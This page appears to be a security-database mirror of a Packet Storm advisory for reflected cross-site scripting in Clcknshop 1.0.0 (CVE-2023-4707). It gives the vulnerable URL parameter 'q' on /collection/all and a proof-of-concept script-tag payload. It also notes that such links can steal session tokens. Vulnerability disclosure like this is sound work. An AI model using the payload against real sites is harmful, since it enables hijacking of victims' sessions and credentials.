Lucene search
CraCkErPACKETSTORM:174444HistorySep 02, 2023 - 12:00 a.m.
Clcknshop 1.0.0 Cross Site Scripting
2023-09-0200:00:00
CraCkEr
packetstormsecurity.com
170
clcknshop
cross site scripting
infosoftbd solutions
windows 10 pro
cve-2023-4707
cwe-79
cwe-74
cwe-707
greetings
xss payloads
EPSS
0.001
Percentile
25.6%
`# Exploit Title: Clcknshop 1.0.0 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 16/08/2023
# Vendor: Infosoftbd Solutions
# Vendor Homepage: https://infosoftbd.com/
# Software Link: https://infosoftbd.com/multitenancy-e-commerce-solution/
# Demo: https://kidszone.clckn.shop/
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-4707
# CWE: CWE-79 - CWE-74 - CWE-707
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path: /collection/all
GET parameter 'q' is vulnerable to XSS
https://website/collection/all?q=[XSS]
XSS Payloads:
jkhrt<script>alert(1)</script>ccnsi
[-] Done
`
Related
cvelist
cvelist
CVE-2023-4707 Infosoftbd Clcknshop all cross site scripting
2023-09-01 17:31:04
osv
osv
CVE-2023-4707
2023-09-01 18:15:07
nvd
nvd
CVE-2023-4707
2023-09-01 18:15:07
prion
prion
Cross site scripting
2023-09-01 18:15:00
zdt
zdt
Clcknshop 1.0.0 Cross Site Scripting Vulnerability
2023-09-04 00:00:00
cve
cve
CVE-2023-4707
2023-09-01 18:15:07